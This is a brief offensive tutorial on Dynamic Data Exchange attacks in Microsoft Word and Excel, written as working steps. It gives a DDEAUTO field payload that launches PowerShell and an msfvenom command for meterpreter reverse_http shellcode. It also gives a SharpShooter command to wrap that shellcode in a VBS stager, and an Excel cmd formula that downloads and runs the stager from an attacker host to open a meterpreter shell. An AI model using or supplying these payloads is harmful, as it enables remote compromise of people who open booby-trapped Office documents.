DDE Auto - Word/Excel

Intro

DDE is an old MS technology that is used to facilitate data transfer between applications. DDE sends messages between applications that share data and uses shared memory to exchange data between applications. DDE can be embedded in several Office file formats

To leverage this attack vector:

Open a new MS document and insert a field

It will add an "!Unexpected End of Formula" to the document, we right-click it and "Toggle field codes" :

We then replace the = * MERGEFORMAT with the payload: 1 { DDEAUTO "C:\Programs\Microsoft\Office\MSWord.exe\..\..\..\windows\system32\WindowsPowershell\v1.0\powershell.exe start calc # " "required"}​ Copied! If we save the document, reopen our document and accept the 2 prompts, calculator will popup.

This attack has been tested on the latest Windows10 LTSC edition with Microsoft Office 365 with up-to-date Windows Defender.

Requirements:

• Enabled Dynamic Data Exchange Server Lookup

• Enabled Dynamic Data Exchange Server Launch

Warning presented to the user who opens the worksheet:

Exploitation

generate msfvenom shellcode:

msfvenom -a x86 -p windows/meterpreter/reverse_http LHOST=192.168.1.108 LPORT=443 EnableStageEncoding=True PrependMigrate=True -f raw -o raw3.txt

Create a malicious VBS script with SharpShooter with included raw3.txt shellcode file we generated earlier:

python2 SharpShooter.py --stageless --dotnetver 2 --payload vbs --output foo2 --rawscfile raw3.txt --amsi amsienable

And inject the command to Microsoft Excel function:

=cmd|'/c cmd.exe /c powershell.exe -nop -w hidden iwr -outf %tmp%\\msf.vbs http://192.168.1.108:8000/foo2.vbs & %tmp%\\msf.vbs'!'A1'

After the user skips the warning we get a meterpreter shell: